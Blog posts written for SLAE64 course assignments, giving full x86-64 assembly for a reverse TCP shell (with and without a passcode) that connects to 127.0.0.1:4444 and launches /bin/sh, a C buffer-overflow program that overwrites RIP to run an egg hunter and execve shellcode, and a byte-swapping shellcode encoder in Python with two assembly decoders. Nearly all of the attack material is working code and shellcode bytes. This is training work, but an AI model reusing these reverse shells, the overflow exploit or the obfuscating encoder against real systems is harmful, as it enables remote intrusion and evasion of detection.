Auteur/autrice : psiracusa

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :

http://www.securitytube-­training.com/online-­courses/x8664-­assembly-­and-­shellcoding-­on-­linux/index.html

Student ID: PA-6470

Assignment #2

The aim of this assignment is to create a shell reverse TCP shellcode with a passcode and to remove all 0x00 from opcodes.

First, we need to listen to incoming connections on port 4444 :

Then we launch the shellcode :

The reverse TCP shellcode open a connection on port 4444 and then we access to the /bin/sh shell !

Here are the opcodes of this shellcode, as you can see there are no 0x00 :

The passcode code part is exactly the same as the one described in Assignment#1

One thing about removing 0x00. At some points the original code contains some 0x00 like here :

mov dword [rsp-4], 0x0100007f

So I’ve chosen to use a substraction in order to have the same result :

;mov dword [rsp-4], 0x0100007f
mov dword [rsp -4], 0x9A999A18
sub dword [rsp -4], 0x99999999

Full source code is available here and on my Github account.

Source code of Reverse-Shell-Passcode-Safe.nasm

; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :
; http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
;
; Author : SLAE64-PA-6470 (kahlon81)
; Date : 2018/02/21
;
; nasm -f elf64 Reverse-Shell-Passcode-Safe.nasm -o Reverse-Shell-Passcode-Safe.o
; ld Reverse-Shell-Passcode-Safe.o -o Reverse-Shell-Passcode-Safe

global _start

section .bss
    buffer resb 20               ; buffer of 20 bytes
    buffer_size equ $ - buffer   ; buffer size
    
section .data
    passcode: db 'pwd',0x0a
    passcode_required: db '#passcode : '
    passcode_required_size equ $ - passcode_required

section .text
_start:

	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41 

	xor rax, rax
	add al, 41
	
	xor rdi, rdi
	inc dil
	inc dil

	xor rsi, rsi
	inc sil	

	xor rdx, rdx
	syscall

	; copy socket descriptor to rdi for future use 

	mov rdi, rax


	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = inet_addr("127.0.0.1")
	; bzero(&server.sin_zero, 8)

	xor rax, rax 

	push rax
	
	;mov dword [rsp-4], 0x0100007f
	mov dword [rsp -4], 0x9A999A18
	sub dword [rsp -4], 0x99999999

	mov word [rsp-6], 0x5c11
	
	;mov word [rsp-8], 0x2
        mov word [rsp-8], 0x1FF
        sub word [rsp-8], 0x1FD

	sub rsp, 8


	; connect(sock, (struct sockaddr *)&server, sockaddr_len)
	
	xor rax, rax
	add al, 42

	mov rsi, rsp
	
	xor rdx, rdx
	add dl, 16	

	syscall


        ; duplicate sockets

        ; dup2 (new, old)
        
	xor rax, rax
	add al, 33

        xor rsi, rsi
	syscall

        xor rax, rax
	add al, 33

        xor rsi, rsi
	inc sil

	syscall

        xor rax, rax
	add al, 33

        xor rsi, rsi
	inc sil
	inc sil	

	syscall


	; passcode is required

	xor rdx, rdx
	mov dl, passcode_required_size

	;mov rsi, passcode_required
	push 0x203a2065			; #passcode : 
	mov rbx, 0x646f637373617023	; #passcode : 
	push rbx
	mov rsi, rsp 

	xor rdi, rdi
	mov dil, 1   ; stdout
        xor rax, rax
	mov al, 1    ; sys_write
	syscall	

	; user input
        
	;mov rdx, buffer_size
        xor rdx, rdx
	mov dl, buffer_size	

	;mov rsi, buffer
        mov rbx, 0x0101010101010101
	push rbx
	mov rsi, rsp

	xor rdi, rdi   ; stdin
        xor rax, rax 
	syscall        ; sys_read

	; check passcode 
	
	;lea rsi, [buffer]      ; user passcode
	;mov rsi, buffer

	;lea rdi, [passcode]    ; true passcode
	;mov rdi, passcode
	push 0x0a647770		; pwd0x0a
	mov rdi, rsp

	xor rcx, rcx 
	dec rcx
cmp_pwd:
	inc rcx
        mov al, byte [rsi + rcx]
	mov dl, byte [rdi + rcx]
	cmp al, dl                  ; compare each character
        jne exit                    ; jump out of loop if they are not the same
	cmp dl, 0x0a                ; end of string ?
	jne cmp_pwd                 ; not finished, loop again


        ; execve

        ; First NULL push

        xor rax, rax
        push rax

        ; push /bin//sh in reverse

        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI

        mov rdi, rsp

        ; Second NULL push
        push rax

        ; set RDX
        mov rdx, rsp

        ; Push address of /bin//sh
        push rdi

        ; set RSI

        mov rsi, rsp

        ; Call the Execve syscall
        add rax, 59
        syscall
 
exit:
	xor rdi, rdi
	add dil, 1
	xor rax, rax
	add al, 60
        syscall

Source code of Reverse-Shell-Safe.nasm :

; This shellcode has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :
; http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
;
; Author : SLAE64-PA-6470 (kahlon81)
; Date : 2018/02/21
;
; nasm -f elf64 Reverse-Shell-Safe.nasm -o Reverse-Shell-Safe.o
; ld Reverse-Shell-Safe.o -o Reverse-Shell-Safe

global _start


_start:

	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41 

	xor rax, rax
	add al, 41
	
	xor rdi, rdi
	inc dil
	inc dil

	xor rsi, rsi
	inc sil	

	xor rdx, rdx
	syscall

	; copy socket descriptor to rdi for future use 

	mov rdi, rax


	; server.sin_family = AF_INET 
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = inet_addr("127.0.0.1")
	; bzero(&server.sin_zero, 8)

	xor rax, rax 

	push rax
	
	;mov dword [rsp-4], 0x0100007f
	mov dword [rsp -4], 0x9A999A18
	sub dword [rsp -4], 0x99999999

	mov word [rsp-6], 0x5c11
	
	;mov word [rsp-8], 0x2
        mov word [rsp-8], 0x1FF
        sub word [rsp-8], 0x1FD

	sub rsp, 8


	; connect(sock, (struct sockaddr *)&server, sockaddr_len)
	
	xor rax, rax
	add al, 42

	mov rsi, rsp
	
	xor rdx, rdx
	add dl, 16	

	syscall


        ; duplicate sockets

        ; dup2 (new, old)
        
	xor rax, rax
	add al, 33

        xor rsi, rsi
	syscall

        xor rax, rax
	add al, 33

        xor rsi, rsi
	inc sil

	syscall

        xor rax, rax
	add al, 33

        xor rsi, rsi
	inc sil
	inc sil	

	syscall


        ; execve

        ; First NULL push

        xor rax, rax
        push rax

        ; push /bin//sh in reverse

        mov rbx, 0x68732f2f6e69622f
        push rbx

        ; store /bin//sh address in RDI

        mov rdi, rsp

        ; Second NULL push
        push rax

        ; set RDX
        mov rdx, rsp

        ; Push address of /bin//sh
        push rdi

        ; set RSI

        mov rsi, rsp

        ; Call the Execve syscall
        add rax, 59
        syscall
 

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :

http://www.securitytube-­training.com/online-­courses/x8664-­assembly-­and-­shellcoding-­on-­linux/index.html

Student ID: PA-6470

Assignment #3

The aim of this assignment is to demonstrate the use of the « egg hunter » technique.

The « egg hunter » is a very small payload that searchs through memory for the real payload to launch and run.

This technique is usefull when you don’t have enough place on the stack to put the real payload.

So here, I’ve written a small piece of C code that demonstrates this technique.

First there is a vulnerable function « vuln() » :

int vuln() {
    char buf[80];
    memcpy(buf, buffer_overflow, 400);
}

This function wants to copy a big array of chars (400 characters) into a smaller array of chars (80 characters).

It’s possible to exploit this buffer overflow by overwriting the return pointer execution, the RIP register.

In order to find the exact position in the buffer, I’ve previously filled the buffer with random characters. Then I’ve launched the program under gdb and waited for the crash. At that moment I’ve looked at the characters located at the top of the stack, on the RSP register. After some tries and errors, I’ve found the exact position in the buffer where to replace the RIP address.

All of this is coded in the set_buffer_overflow() function.

You can see here that I’ve replaced the RIP with the address of the egghunter array of chars :

   // Get egghunter address
   unsigned long sc_addr = (unsigned long)&egghunter;

   // Convert unsigned long egghunter address to an array of char
   int i;
   char adr[sizeof(unsigned long)];
   for(i = 0; i < sizeof(unsigned long); ++i) { adr[i] = sc_addr & 0xff; rip[i] = adr[i]; sc_addr >>= 8;
   }

So now what about the egghunter payload. It’s an assembly x64 code that searchs through memory for the real payload using a marker, this is the « egg ». The egg I’ve chosen here is the « SLAE » string 🙂 where SLAE = \x53\x4c\x41\x45

In order to search through memory you need to start from a far enough address (otherwise you’ll be in an infinite loop), compare with the EGG and then go downward. If you wonder why downward and not to the up, just debug the code under gdb and print the address of the different variables, you’ll understand how variables are located in memory :

root@pentester-VirtualBox:~# gcc -fno-stack-protector -g -z execstack egghunter.c -o egghunter 
root@pentester-VirtualBox:~# gdb ./egghunter
GNU gdb (Ubuntu/Linaro 7.4-2012.04-0ubuntu2.1) 7.4-2012.04
Copyright (C) 2012 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
For bug reporting instructions, please see:
<http://bugs.launchpad.net/gdb-linaro/>...
Reading symbols from /root/egghunter...done.
gdb-peda$ print &egghunter
$1 = (unsigned char (*)[26]) 0x6010a0
gdb-peda$ print &shellcode
$2 = (unsigned char (*)[32]) 0x6010c0
gdb-peda$ 

So here is the code the egghunter :

lea rcx, [rip]
add rcx, 0xff
inc rcx
cmp DWORD PTR [rcx-0x4], EGG
jne -6
jmp rcx

Finally when the egg is found, we just need to jump to the real payload, the shellcode :

unsigned char shellcode[] = "SLAE" // EGG
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";

In order to work correctly, this code needs to be compiled with the -fno-stack-protector -z execstack options and the ASLR must be disabled.

Here is a screenshot of the running program, you can see the execution of the shellcode :

Full source code is available here and on my Github account.

Source code of egghunter.c

/* Student ID: PA-6470 (kahlon81) */
/* SLAE64 */
/* Tested on Ubuntu 12.04 LTS */
/* Compile: gcc -fno-stack-protector -z execstack egghunter.c -o egghunter */
/* Disable ASLR: echo 0 > /proc/sys/kernel/randomize_va_space           */

#include <stdio.h>
#include <string.h>
#include <unistd.h>
// Exploit buffer overflow overwriting RIP (RIP will be set in little endian order)
unsigned char buffer_overflow[400];
unsigned char overflow[] = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";

/*
 * Search for EGG SLAE
 */
unsigned char egghunter[] =
"\x48\x8D\x0D\x00\x00\x00\x00" 	// lea rcx, [rip]
"\x48\x83\xc1\x19"  		// add rcx, 0xff
"\x48\xff\xc1"  		// inc rcx
"\x81\x79\xfc\x53\x4c\x41\x45" 	// cmp DWORD PTR [rcx-0x4], EGG
"\x75\xf4"  			// jne -6
"\xff\xe1";  			// jmp rcx


unsigned char shellcode[] = "SLAE" // EGG
"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05";


int vuln() {
    char buf[80];
    memcpy(buf, buffer_overflow, 400);
}

void set_buffer_overflow() {
   int ov_size = sizeof(overflow);
   unsigned char rip[8];

   // Get egghunter address
   unsigned long sc_addr = (unsigned long)&egghunter;

   // Convert unsigned long egghunter address to an array of char
   int i;
   char adr[sizeof(unsigned long)];
   for(i = 0; i < sizeof(unsigned long); ++i) 
   { 
      adr[i] = sc_addr & 0xff; 
      rip[i] = adr[i]; 
      sc_addr >>= 8;
   }

   // set buffer overflow
   memcpy(buffer_overflow, overflow, ov_size);

   // Ovverride RIP address
   memcpy(buffer_overflow + ov_size - 1, rip, 8);
}


int main(int argc, char *argv[]) {
    printf("Try to exec shellcode\r\n");

    set_buffer_overflow();
    vuln();

    return 0;
}

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :

http://www.securitytube-­training.com/online-­courses/x8664-­assembly-­and-­shellcoding-­on-­linux/index.html

Student ID: PA-6470

Assignment #4

The aim of this assignment is to write a custom shellcode encoder and decoder.

The first thing to do is to dump all the opcodes of the shellcode and think to a way to mix all of them.

Here I’ve chosen a simple but effective algorithm. The encoder starts to swap the first and last opcode then continues to swap opcodes until it reaches the middle of the opcodes. My implementation only works if there is an even number of opcodes. If not, you just need to add  one dummy opcode like a NOP. I’ve called this encoder, the « Mirror Encoder ».

Here is a simple diagram showing how this algorithm works :

Encoder

Here is a screenshot of this running encoder and the encoded shellcode :

Mirror-Encoder.py :

#!/usr/bin/python

# This shellcode encoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :
# http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
#
# Author : SLAE64-PA-6470 (kahlon81)

# python Mirror-Encoder.py 

shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")

encoded = ""
encoded2 = ""
r2 = ""
l2 = ""
rr2 = ""
ll2 = ""

print 'Len: %d' % len(bytearray(shellcode))
print 'Encoded shellcode ...'

arr = bytearray(shellcode)
arr2 = [(arr[i], arr[-i-1]) for i in range(len(arr) // 2)]
#print arr2

for x in range(len(arr2)):
  y = arr2[x]

  # encode for C
  r = '\\x'
  r += '%02x' % y[0]
  r2 = r + r2

  l = '\\x'
  l += '%02x' % y[1]
  l2 = l2 + l

  # encode for ASM
  r = '0x'
  r += '%02x,' % y[0]
  rr2 = r + rr2

  l = '0x'
  l += '%02x,' % y[1]
  ll2 = ll2 + l

# Build encoded strings
encoded = l2 + r2
encoded2 = ll2 + rr2

print 'opcodes for C :'
print encoded
print 'opcodes for ASM :'
print encoded2

Decoder

The decoder is written in assemby and just do the reverse swap.

Here is a screenshot of the running decoder. It decodes the previously encoded shellcode and run it :

The code is self-explanatory, 2 versions available.

Full source code is available here and on my Github account.

Version 1

; This shellcode decoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :
; http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
;
; Author : SLAE64-PA-6470 (kahlon81)
; Date : 2018/02/21
;
; $ nasm -f elf64 Mirror-Decoder.nasm -o Mirror-Decoder.o
; $ ld Mirror-Decoder.o -o Mirror-Decoder

global _start

section .data
encoded_sc:	db 0x05,0x0f,0x3b,0xc0,0x83,0x48,0xe6,0x89,0x48,0x57,0xe2,0x89,0x48,0x50,0xe7,0x89,0x48,0x53,0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f,0xbb,0x48,0x50,0xc0,0x31,0x48
encoded_sc_size equ $ - encoded_sc

section .text
_start:
	lea r8, [rel encoded_sc]
	xor rcx, rcx                 ; offset to first SC byte
	mov rdx, encoded_sc_size - 1 ; offset to last SC byte = SC length -1         
	mov r9, encoded_sc_size	     ; r9 = SC size / 2
	shr r9, 1
decode:
	cmp rcx, r9                  ; SC length / 2 - stop swapping bytes when we are in the middle
	je encoded_sc                ; go to decoded shellcode
	
	mov al, byte [r8+rcx]        ; save values
	mov bl, byte [r8+rdx]

	mov byte [r8+rcx], bl        ; swap values
	mov byte [r8+rdx], al
  
	inc rcx                      ; go to next byte from left to right
	dec rdx                      ; go to next byte from right to left
        jmp short decode                 

Version 2 (JUMP-CALL-POP)

; This shellcode decoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :
; http://www.securitytube-training.com/online-courses/x8664-assembly-and-shellcoding-on-linux/index.html
;
; Author : SLAE64-PA-6470 (kahlon81)
; Date : 2018/02/21
;
; $ nasm -f elf64 Mirror-Decoder.nasm -o Mirror-Decoder.o
; $ ld Mirror-Decoder.o -o Mirror-Decoder

global _start

section .text   
_start:	
        jmp ONSTACK   
GO_LOOP:
        pop r8                       ; r8 is the SC address. pop esi crash ?;
	xor rcx, rcx                 ; offset to first SC byte
	mov rdx, SC_SIZE - 1         ; offset to last SC byte = SC length -1         
	mov r9, SC_SIZE		     ; r9 = SC_SIZE / 2
	shr r9, 1
LOOP:
	cmp rcx, r9                  ; SC length / 2 - stop swapping bytes when we are in the middle
	je SC                        ; go to decoded shell code
	
	mov al, byte [r8+rcx]        ; save values
	mov bl, byte [r8+rdx]

	mov byte [r8+rcx], bl        ; swap values
	mov byte [r8+rdx], al
  
	inc rcx                      ; go to next byte from left to right
	dec rdx                      ; go to next byte from right to left
        jmp LOOP                 
section .data
ONSTACK:
	call GO_LOOP
SC:	db 0x05,0x0f,0x3b,0xc0,0x83,0x48,0xe6,0x89,0x48,0x57,0xe2,0x89,0x48,0x50,0xe7,0x89,0x48,0x53,0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f,0xbb,0x48,0x50,0xc0,0x31,0x48
SC_SIZE equ $ - SC